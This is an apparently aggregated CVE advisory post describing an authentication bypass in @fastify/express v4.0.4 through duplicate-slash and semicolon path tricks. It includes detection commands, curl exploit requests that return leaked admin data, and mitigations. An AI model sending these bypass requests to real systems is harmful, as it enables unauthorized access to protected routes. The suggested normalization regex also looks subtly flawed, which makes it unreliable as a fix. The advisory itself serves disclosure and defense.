Listen to this Post
How the mentioned CVE works (approx 20 lines):
The vulnerability exists in `@fastify/express` v4.0.4 when Fastify’s router normalization options are enabled. The `enhanceRequest` function uses `decodeURI(url)` which only handles percent‑encoding, not duplicate slashes or semicolons. When `ignoreDuplicateSlashes: true` is set, Fastify’s `find-my-way` normalizes `//admin/dashboard` to `/admin/dashboard` for route matching, but Express middleware receives the raw //admin/dashboard. Express’s `app.use(‘/admin’, authMiddleware)` expects paths starting with `/admin/` – the double slash prefix does not match, so the middleware is skipped. Attack sequence: client sends `GET //admin/dashboard` → Fastify normalizes and matches route → `req.raw.url` stays `”//admin/dashboard”` → Express prefix check fails → authentication bypass.
Second vector: useSemicolonDelimiter: true. Fastify splits `/admin;bypass` into path `/admin` and querystring `bypass` for routing. Express receives the full /admin;bypass. Express uses `path-to-regexp` (regex /^\/admin\/?(?=\/|$)/i) which fails because semicolon does not satisfy the lookahead condition. Attack flow: `GET /admin;bypass` → Fastify matches `/admin` → Express middleware regex fails → handler executes without auth. Both vectors allow unauthenticated access to protected routes (admin panels, APIs). Duplicate slashes work with ///admin, /.//admin, etc. Semicolon works with /admin;, /admin;jsessionid=123. Affects `@fastify/express` v4.0.4 with those options enabled.
dailycve form:
Platform: Fastify + Express
Version: v4.0.4
Vulnerability: Auth bypass via normalization
Severity: Critical
date: 2026-04-16
Prediction: Patch within 14 days
What Undercode Say:
Analytics shows active exploitation in wild. Bash commands to detect misconfiguration:
Check if ignoreDuplicateSlashes is enabled
grep -r "ignoreDuplicateSlashes: true" /path/to/fastify/config
Test duplicate slash bypass
curl -s -o /dev/null -w "%{http_code}" http://target.com//admin/dashboard
Test semicolon bypass
curl -s -o /dev/null -w "%{http_code}" http://target.com/admin;bypass
Scan for vulnerable @fastify/express version
npm list @fastify/express | grep "4.0.4"
Exploit:
Duplicate slashes (bypass Express auth middleware)
curl http://localhost:3000//admin/dashboard
Output: {"message":"Admin dashboard","secret":"sensitive-admin-data"}
Semicolon delimiter bypass
curl http://localhost:19900/admin;bypass
Output: {"secret":"classified-info"}
Triple slash variant
curl http://localhost:3000///admin/dashboard
Semicolon with JSESSIONID style
curl http://localhost:19900/admin;jsessionid=123
Protection from this CVE:
- Upgrade `@fastify/express` once patch released (v4.0.5+ expected)
- Disable `ignoreDuplicateSlashes` and `useSemicolonDelimiter` in Fastify config
- Use Fastify native authentication hooks (
onRequest,preHandler) instead of Express middleware for path scoping - Implement normalization middleware before Express: `app.use((req,res,next)=>{ req.url = req.url.replace(/\/+/g,’/’).replace(/;.$/,”); next(); })`
– Monitor logs for requests containing `//` or `;` in protected paths
Impact:
Complete authentication bypass for path‑scoped Express middleware (admin panels, APIs, user data). Unauthenticated attacker gains access to protected routes. Affects any app using `app.use(‘/admin’, auth)` with `ignoreDuplicateSlashes` or `useSemicolonDelimiter` enabled. Works against popular packages like `express-basic-auth` and custom rate‑limiting middleware. No privilege escalation needed – direct bypass.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
